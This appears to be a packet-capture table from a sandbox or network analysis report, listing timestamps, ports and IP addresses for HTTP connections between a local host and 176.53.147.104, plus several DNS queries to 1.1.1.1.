Jan 11, 2025 06:36:26.951843023 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.951948881 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.001827955 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.001899958 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.048547983 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.048615932 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.095582962 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.095654964 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.143557072 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.143625975 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.191570997 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.191622019 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.243598938 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.243653059 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.295600891 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.295722961 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.347588062 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.347788095 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.391120911 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.391454935 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.396399021 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.396409035 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.396425009 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.396434069 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.396460056 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.396464109 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.396470070 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.396502018 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.396526098 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.396677971 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.396687031 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.396728039 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.396778107 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.396789074 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.396816015 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.396825075 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.396831036 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.396891117 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.396893978 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.396914959 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.396929026 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.396948099 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.396964073 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.397021055 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.397037983 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.397074938 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.397135019 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.397169113 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.397197008 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.397238016 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.397325039 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.397358894 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:27.397404909 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
                                        Jan 11, 2025 06:36:27.397495031 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.397510052 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.397557020 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.397559881 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.397593021 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.397608995 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.397629023 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.397634983 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.397675037 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.397675037 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.397720098 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.397787094 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.397836924 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.401277065 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401320934 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401334047 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.401369095 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.401437998 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401447058 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401482105 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.401493073 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401503086 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401561022 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401647091 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401731968 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401738882 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401767969 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401776075 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401798964 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401807070 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401844025 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401851892 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401878119 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401959896 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401968002 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.401974916 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402031898 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402040005 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402046919 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402266979 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.402359009 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402381897 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402417898 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402417898 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.402436972 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402436972 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.402461052 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.402478933 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.402532101 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402540922 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402549982 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402558088 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402580023 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.402622938 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402646065 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402654886 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402662039 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402714014 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402721882 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402787924 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402796984 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402844906 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402852058 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402889013 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402895927 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402965069 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402981043 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.402995110 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403002977 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403059006 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403065920 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403140068 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403146982 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403156996 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403183937 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403203011 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403218031 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403232098 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403239965 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403275013 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403283119 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403357029 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403368950 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403377056 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403423071 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403430939 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403469086 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403476954 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403510094 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403517008 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403557062 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403564930 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.403588057 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.406193972 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.406213999 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.406232119 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.406241894 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.406250000 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407093048 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407157898 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407167912 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407200098 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407210112 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407217979 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407228947 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407253981 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407269001 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407308102 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407335043 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407351017 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407360077 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407371044 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.407402992 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407418966 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407474041 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.407501936 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407512903 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407556057 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407563925 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407644033 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407655001 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407663107 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407670975 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407727957 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407737017 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407778025 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407778978 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407825947 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407843113 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407859087 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407867908 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407900095 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407907963 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407967091 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.407984972 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408000946 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408009052 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408030987 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408041000 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408092022 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408099890 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408135891 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408144951 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408178091 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408186913 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408278942 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408294916 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408310890 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408318996 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408370018 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408381939 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408405066 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.408412933 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412302971 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412390947 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412405968 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412431002 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412440062 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412472010 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412481070 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412528992 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:27.412569046 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412589073 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412612915 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412621021 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412656069 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412668943 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412699938 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412708998 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412786007 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412795067 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412862062 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412870884 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412945986 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.412955999 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413021088 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413031101 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413096905 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413108110 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413116932 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413125992 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413182974 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413192034 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413247108 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413254976 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413264990 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413273096 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413342953 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413355112 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413362026 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413371086 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413398027 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413415909 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413431883 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413440943 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413481951 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413491011 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413527966 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413536072 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413587093 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413602114 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413625002 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413640022 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413664103 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413672924 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413719893 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.413728952 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417537928 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417581081 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417613029 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417629004 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417639017 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417646885 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417655945 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417673111 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417690039 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417709112 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417725086 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417735100 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417768955 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417778015 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417821884 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417829990 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417881012 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417891026 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417933941 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.417987108 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418024063 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418056011 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418133020 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418159008 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418215990 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418226004 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418282032 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418292046 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418319941 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418406010 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418417931 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418426991 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418477058 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418486118 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418514967 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418524981 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418589115 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418598890 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418648005 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418657064 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:30.613703966 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:30.614289999 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:30.619466066 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:30.619518995 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:31.341147900 CET4970780192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:31.346034050 CET8049707176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:31.346133947 CET4970780192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:31.346358061 CET4970780192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:31.351217031 CET8049707176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:32.238010883 CET8049707176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:32.238867998 CET4970780192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:32.243959904 CET8049707176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:32.244015932 CET4970780192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:32.852205038 CET4970880192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:32.857053995 CET8049708176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:32.857146978 CET4970880192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:32.873265028 CET4970880192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:32.878093958 CET8049708176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:33.786113024 CET8049708176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:33.786494017 CET4970880192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:33.791723013 CET8049708176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:33.791776896 CET4970880192.168.2.8176.53.147.104
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 06:36:24.212249041 CET | 55115 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 06:36:24.212344885 CET | 55115 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 06:36:24.219350100 CET | 53 | 55115 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 06:36:24.219377041 CET | 53 | 55115 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 06:36:26.420789003 CET | 55118 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 06:36:26.420850992 CET | 55118 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 06:36:26.889525890 CET | 53 | 55118 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 06:36:26.889542103 CET | 53 | 55118 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 06:36:30.681777954 CET | 55120 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 06:36:30.681835890 CET | 55120 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 06:36:31.149578094 CET | 53 | 55120 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 06:36:31.339991093 CET | 53 | 55120 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 06:36:32.316998005 CET | 55122 | 53 | 192.168.2.8 | 1.1.1.1
